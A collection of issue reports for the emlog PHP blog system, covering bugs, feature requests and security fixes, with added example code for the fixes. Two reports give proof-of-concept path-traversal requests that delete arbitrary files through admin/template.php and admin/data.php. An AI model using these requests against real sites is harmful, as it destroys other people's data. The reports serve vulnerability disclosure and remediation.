emlog / emlog
Lightweight open-source blog and website-building system
License: GNU General Public License v3.0
How do I change the admin password if I've forgotten it?
Registering requires an invitation code ->
Getting an invitation code requires publishing a template ->
Publishing a template requires registering ->
Registering requires an invitation code!
Seriously, have I just not found the right place?
The database connection code is not very compatible across database versions and environments; please upgrade it for compatibility.
I'd like the following file-loading check to be added to init.php so that it is handled there:
```php
function resume_theme($theme) {
    // Load the theme's functions.php only when that file actually exists.
    // (is_file, not is_dir: the path points at a file, so !is_dir() was always true.)
    if (is_file(TPLS_PATH . $theme . "/functions.php")) {
        ob_start();
        include(TPLS_PATH . $theme . "/functions.php");
        ob_end_clean(); // discard any output the include produced and close the buffer
    }
}
resume_theme(Option::get('nonce_templet'));
```
Hi dear friends!
I am glad to inform you that the multilingual version of Emlog Pro is still alive and developing in sync with the original version.
The Emlog Pro ML repository is hosted at sourceforge: https://sourceforge.net/p/emlog-ml/
FYI: My previous message about Emlog ML was posted here 7 years ago:
#27
I want to add my own ignored files to the .gitignore file, but I cannot do that because this file is included in the git index :(
It would be nice to remove .gitignore from the repository, but add a .gitignore.sample file.
This solution would allow each developer to add their own files to the ignore list.
During tag SQL processing, the SQL that adds a tag performs an encoding conversion, but no corresponding handling is done on output; please improve this.
Steps to reproduce: add strings such as “” / \ in the tag field and the problem appears.
Virtual hosts block access to configure.php by default, so it cannot be opened.
After renaming the file it can be opened, but submitting fails with "insufficient permissions, token error".
Import/export has problems when the database prefix contains uppercase letters.
At the moment jQuery is placed twice in the emlog:
It would be nice to store jQuery only once, i.e. in the common assets folder:
BLOG_URL/assets/jquery.min.3.5.1.js
On the last step of the installer it shows: the server's PHP does not support the MySQL database.
Write a small feature that allows custom fields to be added to the emlog_blog table; it could be put in a small "Developer" tab under the backend System section.
After templates or plugins are downloaded, many temporary files such as
emtemp_nPLfdU
emtemp_Qw00qK
are left in the /tmp directory. On servers that are not restarted for a long time, many emlog sites installing many plugins will consume too much disk space. Cleanup logic needs to be added to the code.
Suggest adding a useragent field to the comment table for later use by developers.
vulnerability in admin/template.php line 67:
```php
if ($action == 'del')
{
    LoginAuth::checkToken();
    $tplName = isset($_GET['tpl']) ? addslashes($_GET['tpl']) : '';
    $nonce_templet = Option::get('nonce_templet');
    if ($tplName === $nonce_templet)
    {
        emMsg('您不能删除正在使用的模板'); // "You cannot delete the template currently in use"
    }
    if (true === emDeleteFile(TPLS_PATH . $tplName)) {
        emDirect("./template.php?activate_del=1#tpllib");
    } else {
        emDirect("./template.php?error_a=1#tpllib");
    }
}
```
if (true === emDeleteFile(TPLS_PATH . $tplName))
tracing the emDeleteFile function:
```php
function emDeleteFile($file)
{
    if (empty($file)) return false;
    if (@is_file($file)) return @unlink($file);
    $ret = true;
    if ($handle = @opendir($file)) {
        while ($filename = @readdir($handle)) {
            if ($filename == '.' || $filename == '..') continue;
            if (!emDeleteFile($file . '/' . $filename)) $ret = false;
        }
    } else {
        $ret = false;
    }
    @closedir($handle);
    if (file_exists($file) && !rmdir($file)) {
        $ret = false;
    }
    return $ret;
}
```
The “../” sequence is not restricted.
Log in to the admin backend and visit /admin/template.php?action=del&tpl=../../index.php&token=U (your login token)!
POC:
/emlog/admin/template.php?action=del&tpl=../../index.php&token={U login token}
The getMonthDayNum($month, $year) function in /include/lib/function.base.php takes two parameters.
When the parameter is later used in array_key_exists, the code simply assumes it is an int.
In reality the incoming parameter is a string, and the month has a leading zero.
For example, when the archive feature queries 201101, the parameters actually passed in are "01" and "2011".
Using "01" directly for the array_key_exists match fails to match.
As a result it falls through to the later branch that returns February's 28 days, so some posts cannot be shown in the archive.
The leap-year algorithm is also wrong.
It first needs to check whether the year is divisible by 100.
A year divisible by 100 is only a leap year if it is also divisible by 400.
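The corrected function, written as an added example for this report and not taken from emlog's own source (only the function name and parameter order match the issue): it casts the string arguments that the archive page actually passes, and applies the full Gregorian leap-year rule described above.

```php
<?php
// Added example, not emlog's own code: getMonthDayNum() accepting the string
// parameters the archive page passes ("01", "2011") and using the complete
// Gregorian leap-year rule. The function name matches the issue; the body is
// this example's own.
function getMonthDayNum($month, $year)
{
    // Normalise the inputs: "01" -> 1, "2011" -> 2011, so a leading zero no
    // longer breaks the lookup below.
    $month = (int) $month;
    $year  = (int) $year;

    if ($month < 1 || $month > 12) {
        return false; // reject out-of-range months instead of guessing
    }

    $days = [1 => 31, 2 => 28, 3 => 31, 4 => 30, 5 => 31, 6 => 30,
             7 => 31, 8 => 31, 9 => 30, 10 => 31, 11 => 30, 12 => 31];

    if ($month === 2 && isLeapYear($year)) {
        return 29;
    }
    return $days[$month];
}

// Gregorian rule: divisible by 4, except centuries, which must be divisible by 400.
function isLeapYear($year)
{
    if ($year % 400 === 0) {
        return true;
    }
    if ($year % 100 === 0) {
        return false;
    }
    return $year % 4 === 0;
}

// Constructed checks: the issue's own example (archive query 201101) plus the
// century edge cases that the old algorithm got wrong.
assert(getMonthDayNum('01', '2011') === 31);
assert(getMonthDayNum('02', '2000') === 29); // divisible by 400 -> leap year
assert(getMonthDayNum('02', '1900') === 28); // divisible by 100 but not 400 -> not a leap year
assert(getMonthDayNum('02', '2012') === 29);
assert(getMonthDayNum('13', '2012') === false);
```

The cast to int is what fixes the archive bug: once "01" becomes 1 the lookup succeeds, so the 28-day fallback is only ever reached for a real February.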
Comments section
Found some low-performance statements that do full table scans; with many comments (10k+) or high concurrency on multi-site setups they raise MySQL I/O pressure:
```sql
SELECT gid FROM emlog_comment where hide='y';
SELECT cid FROM emlog_comment WHERE hide='n';
SELECT * FROM emlog_comment as a where 1=1 and a.gid=2 and a.hide='n' ORDER BY a.date ASC;
```
After editing the config file to add new allowed upload file extensions, batch upload in the backend still does not work.
Hi friends!
For many years I have been watching Emlog with great interest.
I offer to convert Emlog from Single-lingual to Multi-lingual.
I think such version will be quite interesting for many users.
For example:
My English demo version: http://codersclub.org/emlog/
There is no problem to add any other language.
I.e. at my localhost I have Chinese + English + Russian language packs installed together.
My current code repository: https://bitbucket.org/vot/emlog
Let's work together!
Using it right after installation produces the error above.
Fix:
line 195 of /src/include/lib/cache.php
```php
194 while($row = $this->db->fetch_array($query)) {
195 $$row['option_name'] = $row['option_value'];
196 }
197 $query = $this->db->query("SELECT * FROM " . DB_PREFIX . "comment WHERE hide='n' ORDER BY date DESC LIMIT 0, $index_comnum");
```
Change line 195 to: ${$row['option_name']} = $row['option_value'];
System environment:
~ ᐅ php -v
PHP 7.0.2 (cli) (built: Jan 7 2016 10:40:26) ( NTS )
Copyright (c) 1997-2015 The PHP Group
Zend Engine v3.0.0, Copyright (c) 1998-2015 Zend Technologies
~ ᐅ uname -a
Darwin Snail 15.3.0 Darwin Kernel Version 15.3.0: Thu Dec 10 18:40:58 PST 2015; root:xnu-3248.30.4~1/RELEASE_X86_64 x86_64
It threw an error once after installation; after that, every published post throws an error, posting and deleting comments both redirect to the error page, the template's latest comments, latest posts and latest tweet modules show the same error, and tweets are blank with no text after posting. After a long search I found it is not a module problem.
SQL statement execution error: SELECT * FROM emlogg_comment WHERE hide='n' ORDER BY date DESC LIMIT 0,
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1
1. EMLOG's login-failure message: a proper login system should not reveal whether an account exists, as that makes brute-forcing easy. A wrong account or a wrong password should give the same message: account or password incorrect.
2. The backend login captcha can be brute-forced; it is effectively decorative and can be abused by an attacker for brute-forcing.
Fix: in /admin/globals.php, after the else on line 33, add unset($_SESSION['code']);
Every time a check throws an error, destroy $_SESSION['code']; as soon as a wrong password occurs once, $_SESSION['code'] is destroyed automatically.
Configuration:
PHP version: 5.6.40
MySQL version: 5.7.32-log
Server environment: nginx/1.18.0
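An added example, not emlog's own login code, showing the two points of the report above in one small login routine: the failure message is identical whether the account is missing or the password is wrong, and the captcha code is consumed on every attempt (the effect of the unset($_SESSION['code']) fix), so one solved code cannot be replayed across password guesses. The session is an array standing in for $_SESSION, the user list is constructed for the demo, and the helper names are this example's own. It goes one step beyond the report by also verifying against a dummy hash for unknown accounts, so response time does not distinguish "no such user" from "wrong password".

```php
<?php
// Added example (not emlog's own code). $session stands in for $_SESSION,
// $users for the account table; both are constructed for the demo.

const LOGIN_FAILED = 'Account or password incorrect';

// Hash used when the account does not exist, so password_verify() still runs
// and the timing of the two failure cases is the same.
define('DUMMY_HASH', password_hash('not-a-real-password', PASSWORD_DEFAULT));

// One-time captcha: the stored code is discarded before the outcome is known,
// whether the submitted value matches or not.
function checkCaptcha(array &$session, $submitted)
{
    $expected = isset($session['code']) ? (string) $session['code'] : null;
    unset($session['code']);
    return $expected !== null && hash_equals($expected, (string) $submitted);
}

function attemptLogin(array &$session, array $users, $name, $password, $captcha)
{
    if (!checkCaptcha($session, $captcha)) {
        return ['ok' => false, 'message' => 'Captcha incorrect'];
    }
    $exists = isset($users[$name]);
    $hash   = $exists ? $users[$name] : DUMMY_HASH;
    // One combined result: the caller never learns which half failed.
    $valid  = password_verify($password, $hash) && $exists;
    if (!$valid) {
        return ['ok' => false, 'message' => LOGIN_FAILED];
    }
    return ['ok' => true, 'message' => 'Welcome ' . $name];
}

// Constructed account table.
$users = ['admin' => password_hash('correct horse', PASSWORD_DEFAULT)];

// Wrong password and unknown user produce the same message.
$session = ['code' => 'ab12'];
$r1 = attemptLogin($session, $users, 'admin', 'wrong', 'ab12');
$session = ['code' => 'ab12'];
$r2 = attemptLogin($session, $users, 'nobody', 'wrong', 'ab12');
assert($r1['message'] === LOGIN_FAILED && $r2['message'] === LOGIN_FAILED);

// The captcha is gone after one attempt, so the same code cannot be replayed.
$session = ['code' => 'ab12'];
attemptLogin($session, $users, 'admin', 'wrong', 'ab12');
assert(!isset($session['code']));
$r3 = attemptLogin($session, $users, 'admin', 'correct horse', 'ab12');
assert($r3['ok'] === false && $r3['message'] === 'Captcha incorrect');

// A fresh code plus the right password still logs in.
$session = ['code' => 'zz99'];
assert(attemptLogin($session, $users, 'admin', 'correct horse', 'zz99')['ok'] === true);
```

The captcha message may differ from the credential message because it reveals nothing about the account; what matters is that the account-exists and wrong-password paths are indistinguishable in both text and timing.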
After the setting is enabled, posts published by normal authors must be reviewed before they are published.
This repository has not been updated for more than seven months; is nobody maintaining it anymore?
Hello, is it not possible to publish posts without registering?
The PSR-1 programming style recommendation advises using the short tag "<?=" instead of the long expression "<?php echo".
I suggest using "<?=" throughout all templates. This will make your code cleaner and prettier.
The wiki documentation still cannot be viewed; is theme customization no longer supported?
It would be nice to add an icon to every sidebar menu item.
See the screenshot below:
My solution is here:
https://bitbucket.org/vot/emlog/commits/6cbc17521d152b18f9c9628cb16c4b6f425ee362
You can remove Chinese language from Google Map.
Now the language is set automatically ("en" for me).
My commit:
https://bitbucket.org/vot/emlog/commits/6d3b22029427506de4ea7fd38179d81ddc337ed3
Unfortunately the plugin "/src/include/lib/js/jquery/plugin-interface.js" is obsolete.
It is not working with the modern jQuery versions.
This plugin is used for reorder the widget positions in the sidebar.
I offer to replace plugin-interface.js with the HTML5 jquery.sortable plugin.
My ready to use solution is here:
https://bitbucket.org/vot/emlog/commits/d5544a308dbf05aa52ea635c7d6d63c2699e08fb
I hope a global check-for-updates tool can be added, and that the related project files are then pushed to the GitHub project.
Has the author changed? Did the original author sell emlog?
http://bbs.emlog.net/thread-33370-1-1.html
Users creating a large number of categories have already run into problems.
Currently the category field is a signed tinyint with a default value of -1. If a user has more than 127 categories, no more can be added. Wasting tinyint's 127 positive values for a single -1 is unnecessary; consider using 0 for "no category" instead of -1 and changing the field to unsigned tinyint, which supports 255 categories and should be enough.
Bug: on the mobile version, viewing a parent category does not show its subcategories.
vulnerability in admin/data.php line 139:
```php
if ($action == 'dell_all_bak') {
    if (!isset($_POST['bak'])) {
        emDirect('./data.php?error_a=1');
    } else {
        foreach ($_POST['bak'] as $val) {
            unlink($val);
        }
        emDirect('./data.php?active_del=1');
    }
}
```
Posting any file path as "bak" will delete it.
Log in to the admin backend and visit /admin/data.php?action=dell_all_bak
POST bak=anyfile, like ../index.php or similar.
POC:
```http
Host: 127.0.0.1
Content-Length: 28
Cache-Control: max-age=0
Origin: http://127.0.0.1
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: http://127.0.0.1/emlog/admin/data.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: page_iframe_url=http://127.0.0.1/metinfo/index.php?lang=cn&pageset=1; pgv_pvi=3037471744; PHPSESSID=u91v66ktst9vrva3ueb6333kt2; EM_AUTHCOOKIE_WtaQDRqaTBRof8EENT0LY3HNhJzryEPL=admin%7C%7Ce4739a735508976ba1d54ac95a78be3b; EM_TOKENCOOKIE_55cd567609038eefc9aaa8c1c0e141e1=d0025af7e912a4cc8b114e2f6cda6597
Connection: close

bak%5B%5D=../include/index.php
```
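Both reports on this page (the admin/template.php action=del handler and the admin/data.php action=dell_all_bak handler above) are the same defect: a request-controlled name is joined to a base directory and deleted without checking that the resolved path stays inside that directory. The following is an added example, not emlog's own code, of hardened versions of both handlers sharing one containment check. TPLS_PATH and BAK_PATH here point at temporary directories created for the demo, the helper names (resolveInside, deleteTree, safeDeleteTemplate, safeDeleteBackups) are this example's own, and the assumption that backups are .sql files directly inside the backup directory is the example's, not something the page states.

```php
<?php
// Added example (not emlog's own code): hardened delete handlers for the two
// traversal reports above. TPLS_PATH / BAK_PATH are demo directories; helper
// names are this example's own.

function resolveInside($baseDir, $name)
{
    // Allow only a single plain path segment; this alone blocks "../" and
    // absolute paths, and realpath() below also catches symlinks pointing out.
    if (!preg_match('/^[A-Za-z0-9_.-]+$/', $name) || $name === '.' || $name === '..') {
        return false;
    }
    $base   = realpath($baseDir);
    $target = realpath($baseDir . DIRECTORY_SEPARATOR . $name);
    if ($base === false || $target === false) {
        return false;
    }
    // The resolved target must sit strictly below the resolved base directory.
    if (strpos($target, $base . DIRECTORY_SEPARATOR) !== 0) {
        return false;
    }
    return $target;
}

function deleteTree($path)
{
    if (is_file($path)) {
        return unlink($path);
    }
    foreach (scandir($path) as $entry) {
        if ($entry === '.' || $entry === '..') continue;
        if (!deleteTree($path . DIRECTORY_SEPARATOR . $entry)) return false;
    }
    return rmdir($path);
}

function safeDeleteTemplate($tplName, $activeTemplate)
{
    if ($tplName === $activeTemplate) {
        return 'in-use';        // the active template is never deleted
    }
    $path = resolveInside(TPLS_PATH, $tplName);
    if ($path === false || !is_dir($path)) {
        return 'rejected';      // traversal attempt, or no such template directory
    }
    return deleteTree($path) ? 'deleted' : 'error';
}

function safeDeleteBackups(array $names)
{
    $results = [];
    foreach ($names as $name) {
        $path = resolveInside(BAK_PATH, $name);
        // Backups are plain .sql files inside BAK_PATH (assumption); refuse the rest.
        if ($path === false || !is_file($path) || substr($name, -4) !== '.sql') {
            $results[$name] = 'rejected';
            continue;
        }
        $results[$name] = unlink($path) ? 'deleted' : 'error';
    }
    return $results;
}

// Demo on a constructed directory tree.
$root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'emlog_demo_' . getmypid();
define('TPLS_PATH', $root . '/content/templates/');
define('BAK_PATH',  $root . '/content/backup/');
mkdir(TPLS_PATH . 'oldtheme', 0700, true);
mkdir(BAK_PATH, 0700, true);
touch($root . '/index.php');
touch(BAK_PATH . 'site-2024.sql');

assert(safeDeleteTemplate('../../index.php', 'default') === 'rejected');
assert(safeDeleteTemplate('oldtheme', 'default') === 'deleted');
assert(safeDeleteBackups(['../../index.php', 'site-2024.sql'])
       === ['../../index.php' => 'rejected', 'site-2024.sql' => 'deleted']);
assert(file_exists($root . '/index.php')); // untouched by both traversal attempts

deleteTree($root); // clean up the demo tree
```

The allow-list regex does most of the work and is easy to reason about; the realpath() comparison is the second line of defence for cases the regex cannot see, such as a symlink inside the template directory that points elsewhere. Note that addslashes(), which the original handler applies to tpl, does nothing against "../" and is not a substitute for either check.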
Does this mean emlog is gone for good?
Bug:
After deleting the default administrator, the sidebar blogger is not shown, posts published by any administrator show no author, and there is a notice error.
Analysis:
When a subcategory is added on the category page, the navigation cache is not updated, and the submenu entries in the navigation cache are also deleted.